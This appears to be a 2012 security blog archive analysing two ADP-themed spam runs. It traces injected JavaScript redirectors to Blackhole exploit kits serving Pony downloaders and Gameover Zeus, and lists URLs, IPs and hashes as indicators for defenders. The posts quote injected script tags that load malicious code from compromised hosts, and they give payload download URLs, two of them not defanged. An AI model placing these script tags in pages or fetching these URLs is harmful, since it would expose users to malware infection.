Monthly Archives: June 2012

ADP Security Management Update

We analyzed following malicious URL which is used in ADP themed spam on June 28/29 2012:

hxxp://web.abmes.org.br/EiqyDBxS/index.html

ADP Security Update

The spam sample we analyzed was sent from 95.41.229.91 – a known Cutwail spambot.

This malicious page contained 4 javascripts as shown below:

<script type=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<script type=”text/javascript” src=”hxxp://egerak.ipislam.edu.my/vp0BYhy2/js.js”></script>
<script type=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>

Eventually these malicious JS redirects victim to a Blackhole Exploit kit at 173.255.228.171.

This Blackhole exploit kit was hosting at least 14 different malicious payloads. Detected malware payloads identified by MD5 hash included the following:

  • e6341e75dc5413720cbb03f6836ac39d
  • 1277be3dfecd932a1b4b32b1f0942146
  • 13b08f673c05c81b1f5b3344b23f79a2
  • 53fdca7c26b10de657cb4a4906cf6510
  • 488559808a353430357f4c3db9fb126f
  • 13b08f673c05c81b1f5b3344b23f79a2
  • 48a89c2e1816e2f8ec38071b45c72e6e
  • fe05f07e54adbf2d55946643f9a76f83
  • bee7603e2fb3dcb9dcf1c5589d551cb5
  • 1b1bbf726902beb3b25d11fbdc58720f
  • 017c71a4f156df3300d01ace4e01087a
  • e11534af5bb6a69726524e6851d8136d
  • 017c71a4f156df3300d01ace4e01087a
  • ced5d89b3d27b85e9418a94ef2aac990

All of these binaries appear, upon initial inspection, to be Pony downloaders.
Pony downloader posts to its dropzone at hxxp://182.23.41.18/pony/gate.php and also downloads 3 identical Gameover Zeus from following locations:

1. hxxp://ftp.fundwaysofmo.com/pdqPv.exe
2. hxxp://www.artevoz.com.br/9D0JP.exe
3. hxxp://diclebaliksepeti.com/fJoqfYi.exe

Advertisements

ADP Funding Notification – Debit Draft

Weve been quiet recently, but we havent stopped our work. Behind the scenes weve been developing some new tools and techniques that we hope will enable us to more efficiently track the bad guys. We used some of these new tools and techniques in our analysis of a new spam run today that spoofed communications from ADP. We observed spam messages with the subject line “ADP Funding Notification – Debit Draft”. The spam sample we analyzed was sent from 78.96.173.243 – a known Cutwail spambot.

The link in this message directed victims to junnioreadriano.com.br/MZ0PnMj5/index.html. Note that our bad guys are still using the same /8-random-character/index.html pattern. This page contained the following two malicious javascript redirectors:

http://ftp.leocardz.com/BhSFTbq9/js.js
http://www.webondemand.altervista.org/V4uags9T/js.js

These javascripts redirector victims to a Blackhole Exploit kit at 50.116.38.183. This Blackhole exploit kit was hosting at least 9 different malicious payloads. Detected malware payloads identified by MD5 hash included the following:

ce03b87d1d10e76526883077d3924528
937b44fbb5fec18f53c6de60a801d8ed
13fd74a6dc4f1e8e952ea2bc692ede5e
58859d47ccd39461a52a9455f3b0a8ac
9af1128108aac221fd16ddc213c8147a
48a5cd662c66fcdf3ee96ea2126096c7
a08780b691232573e9895589b7f0b76f
1b1bbf726902beb3b25d11fbdc58720f
ededc8b9d03ded0cb7818dc2ef72ad4c

All of these binaries appear, upon initial inspection, to be Pony downloaders.